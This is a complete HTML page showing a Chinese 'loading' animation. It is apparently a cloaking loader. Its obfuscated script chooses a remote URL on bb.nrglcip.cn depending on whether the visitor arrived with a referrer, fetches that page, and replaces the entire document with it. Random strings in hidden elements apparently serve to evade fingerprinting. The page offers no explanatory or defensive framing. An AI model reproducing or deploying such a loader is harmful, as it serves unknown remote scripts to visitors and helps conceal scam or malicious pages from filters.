<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Acazawpu9 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Acazawpu9 .XSYQMJUv {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Acazawpu9 .content {
            line-height: 50px;
            text-align: center
        }

        .Acazawpu9 .img {
            width: 100%
        }

        .Acazawpu9 .Q7dHuXalH {
            text-align: center
        }

        .Acazawpu9 .Q7dHuXalH span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Acazawpu9 .Q7dHuXalH span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Acazawpu9 .Q7dHuXalH span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Acazawpu9 .Q7dHuXalH span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Acazawpu9 .Q7dHuXalH span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Acazawpu9 .Q7dHuXalH span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Acazawpu9 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function EIlkaY2zZMu(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var mWtEmr = EIlkaY2zZMu('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ mWtEmr +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ mWtEmr +".html?a=share";
		}
		
        mVzZtwseV=url+"#"+new Date().getTime();
        mVzZtwseV && function() {
            $.get(mVzZtwseV, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >WtacupAbWFb1Vms9C8tcnXFwtcE9IR81rrtimqCKjsuGZAF0AGA6MwMpil9TQmwpA2VUFNiIrF</h1>
<b style='display:none' >SohCRP26nwvfM01zjmDjZrw</b>
<ul style='display:none' >VcEV3oIgjTtEUYcYpEjoUwGqg1gXT9Hx6Ye7qNzv2w2EfFhG</ul>
<ul style='display:none' >VcEV3oIgjTtEUYcYpEjoUwGqg1gXT9Hx6Ye7qNzv2w2EfFhG</ul>
<h1 style='display:none' >WtacupAbWFb1Vms9C8tcnXFwtcE9IR81rrtimqCKjsuGZAF0AGA6MwMpil9TQmwpA2VUFNiIrF</h1>
<ul style='display:none' >VcEV3oIgjTtEUYcYpEjoUwGqg1gXT9Hx6Ye7qNzv2w2EfFhG</ul>
<a  href='#' style='display:none'>XKhzoYwIsWeSh5A6qP27jtAgDdHQsPG1RWbTFvVf85KFALR78Hy</a><div class="Acazawpu9">
    <div class="XSYQMJUv">
        <div class="Q7dHuXalH">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<span style='display:none'>vRzkoeQ7xCBxXoasGXbzrnkIdghNyOKKB74T6JAHTOAkfDo9wUYSggSP</span>
<ul style='display:none' >upMpPOSmBrhjrmYRxpx5VtYGapNXS2jImWWObatxXwHr6sjEmPjpI8On9q3zIGxn1rfXqbAEbMZvu4eR2Q2YPrYwvF0wG2</ul>
<b style='display:none' >H64hfvMQtHEJBFcGmKTxDYv2lkRRafTj</b>
<img  src='' style='display:none'></body>
</html>